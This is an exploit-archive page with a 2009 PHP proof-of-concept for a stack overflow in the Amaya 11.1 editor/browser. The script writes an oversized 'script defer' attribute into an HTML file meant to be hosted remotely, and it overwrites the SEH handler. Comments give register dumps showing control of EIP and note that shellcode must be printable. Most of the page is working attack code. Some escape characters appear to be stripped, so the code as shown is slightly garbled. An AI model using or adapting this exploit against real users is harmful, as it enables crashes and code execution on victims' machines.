Amaya 11.1 W3C Editor/Browser (defer) Stack Overflow PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Amaya 11.1 W3C Editor/Browser (defer) Stack Overflow PoC
# Published : 2009-03-30
# Author : Alfons Luja
# Previous Title : RealVNC 4.1.2 (vncviewer.exe) RFB Protocol Remote Code Execution PoC
# Next Title : Opera 9.64 (7400 nested elements) XML Parsing Remote Crash Exploit

<?php

/**//*

     Amaya 11.1 W3C's editor/browser
     Stack Owerflow POC
     Discover by Alfons Luja 
     Thx : OiN 
     select * from friends --
     This stUff overwrite SEH in my box XP home sp 2 
     To correctly overwrite seh you must upload "remote_love.html" to remote server 
     Amaya allow only printable shellcode in this case   
     
     EAX:00000000
     ECX:43434343
     EDX:7C9037D8
     EBX:00000000
     ESP:0012DDD0
     EBP:0012DDF0
     ESI:00000000
     EDI:00000000
     EIP:43434343
     
      
*//**/ 

$junk = "x41";
$n_seh = "x42x42x42x42";  //pointer to next seh
$h_seh = "x43x43x43x43";  //seh handler

for($i=1;$i<7000 - (4*19) - 10;$i++){ $junk.="x41"; }

$junk.=$n_seh;
$junk.=$h_seh;
$hello = "<script defer="".$junk."">";

$hnd = fopen("remote_love.html","w");
     
       if($hnd){

          fputs($hnd,$hello);
          fclose($hnd);
          echo"DONE !!n";
     
       } else {

          echo"Kupa !!n";

       }

?>

# www.Syue.com [2009-03-30]